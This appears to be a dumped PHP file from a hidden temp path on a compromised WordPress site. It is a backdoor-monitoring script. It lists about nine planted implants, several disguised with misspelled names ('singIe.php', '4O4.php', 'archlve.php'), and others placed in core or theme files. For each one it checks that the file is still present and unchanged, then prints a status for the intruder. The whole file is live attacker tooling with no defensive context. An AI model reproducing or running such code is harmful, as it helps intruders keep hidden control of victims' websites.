File: //var/tmp/.request
<?php $r = '/home/bryanl/casadelovely.com'; $x = ["/wp-admin/upgrade-functions.php"=>"bd@@240398@@Server-Timing",
"/wp-content/plugins/contact-1751120357/wp-config.php"=>"bd@@429102@@727",
"/wp-content/themes/custom_file_1_1747810203/index.php"=>"bd@@195149@@If-Unmodified-Since",
"/wp-content/themes/custom-file-5-1751707231/singIe.php"=>"bd@@437397@@727",
"/wp-content/themes/category_template_1757841258/4O4.php"=>"bd@@457896@@967",
"/wp-includes/class-wp-feed-cache-transient.php"=>"bd@@369074@@_COOKIE[3]",
"/wp-content/plugins/analytics-1747417690/archlve.php"=>"bd@@576466@@1166",
"/wp-includes/block-patterns/search_template_1748022694.php"=>"bd@@777186@@727",
"/wp-content/themes/twentytwentyfive/patterns/template-archive-vertical-header-blog.php"=>"bd@@369386@@publish_content"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');